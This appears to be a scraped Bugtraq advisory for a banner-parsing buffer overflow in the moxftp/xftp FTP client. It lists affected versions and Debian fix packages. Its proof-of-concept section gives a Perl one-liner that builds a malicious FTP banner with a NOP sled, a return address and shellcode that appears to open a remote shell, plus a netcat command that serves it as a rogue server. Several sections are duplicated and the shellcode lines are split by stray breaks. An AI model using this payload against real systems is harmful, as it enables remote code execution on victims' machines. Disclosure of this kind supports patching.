moxftp Banner Parsing Buffer Overflow Vulnerability
BID:6921
Info
moxftp Banner Parsing Buffer Overflow Vulnerability
| Bugtraq ID: | 6921 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2003-0203 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 24 2003 12:00AM |
| Updated: | Jul 11 2009 08:06PM |
| Credit: | Discovery of this vulnerability credited to Knud Erik Højgaard. |
| Vulnerable: |
xftp xftp 2.2 moxftp moxftp 2.2 |
| Not Vulnerable: | |
Discussion
moxftp Banner Parsing Buffer Overflow Vulnerability
A buffer overflow vulnerability has been reported for moxftp. The vulnerability occurs when moxftp is parsing 'Welcome' banner messages from remote FTP servers. When moxftp receives an overly long FTP banner, it will trigger the overflow condition.
An attacker can exploit this vulnerability by enticing a victim moxftp user to connect to a malicious FTP server.
Any attacker-supplied code will be executed on the victim system with the privileges of the moxftp process.
This vulnerability also affects xftp which is based upon moxftp.
A buffer overflow vulnerability has been reported for moxftp. The vulnerability occurs when moxftp is parsing 'Welcome' banner messages from remote FTP servers. When moxftp receives an overly long FTP banner, it will trigger the overflow condition.
An attacker can exploit this vulnerability by enticing a victim moxftp user to connect to a malicious FTP server.
Any attacker-supplied code will be executed on the victim system with the privileges of the moxftp process.
This vulnerability also affects xftp which is based upon moxftp.
Exploit / POC
moxftp Banner Parsing Buffer Overflow Vulnerability
The following proof of concept was provided:
$ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "\x90" x 100 . "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\ x9d\x02\x24\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\ xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\ x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80" .
"\n"' > file
# nc -l -p 21 < file
The following exploit is available:
The following proof of concept was provided:
$ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "\x90" x 100 . "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\ x9d\x02\x24\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\ xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\ x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80" .
"\n"' > file
# nc -l -p 21 < file
The following exploit is available:
Solution / Fix
moxftp Banner Parsing Buffer Overflow Vulnerability
Solution:
Fixes available:
xftp xftp 2.2
Solution:
Fixes available:
xftp xftp 2.2
-
Debian xftp_2.2-13.1_alpha.deb
Debian GNU/Linux 2.2 alias potato
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-13.1_al pha.deb -
Debian xftp_2.2-13.1_arm.deb
Debian GNU/Linux 2.2 alias potato
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-13.1_ar m.deb -
Debian xftp_2.2-13.1_i386.deb
Debian GNU/Linux 2.2 alias potato
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-13.1_i3 86.deb -
Debian xftp_2.2-13.1_m68k.deb
Debian GNU/Linux 2.2 alias potato
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-13.1_m6 8k.deb -
Debian xftp_2.2-13.1_powerpc.deb
Debian GNU/Linux 2.2 alias potato
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-13.1_po werpc.deb -
Debian xftp_2.2-13.1_sparc.deb
Debian GNU/Linux 2.2 alias potato
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-13.1_sp arc.deb -
Debian xftp_2.2-18.1_alpha.deb
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-18.1_al pha.deb -
Debian xftp_2.2-18.1_arm.deb
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-18.1_ar m.deb -
Debian xftp_2.2-18.1_hppa.deb
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-18.1_hp pa.deb -
Debian xftp_2.2-18.1_i386.deb
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-18.1_i3 86.deb -
Debian xftp_2.2-18.1_ia64.deb
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-18.1_ia 64.deb -
Debian xftp_2.2-18.1_m68k.deb
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-18.1_m6 8k.deb -
Debian xftp_2.2-18.1_mips.deb
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-18.1_mi ps.deb -
Debian xftp_2.2-18.1_mipsel.deb
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-18.1_mi psel.deb -
Debian xftp_2.2-18.1_powerpc.deb
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-18.1_po werpc.deb -
Debian xftp_2.2-18.1_s390.deb
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-18.1_s3 90.deb -
Debian xftp_2.2-18.1_sparc.deb
http://security.debian.org/pool/updates/main/m/moxftp/xftp_2.2-18.1_sp arc.deb
References
moxftp Banner Parsing Buffer Overflow Vulnerability
References:
References: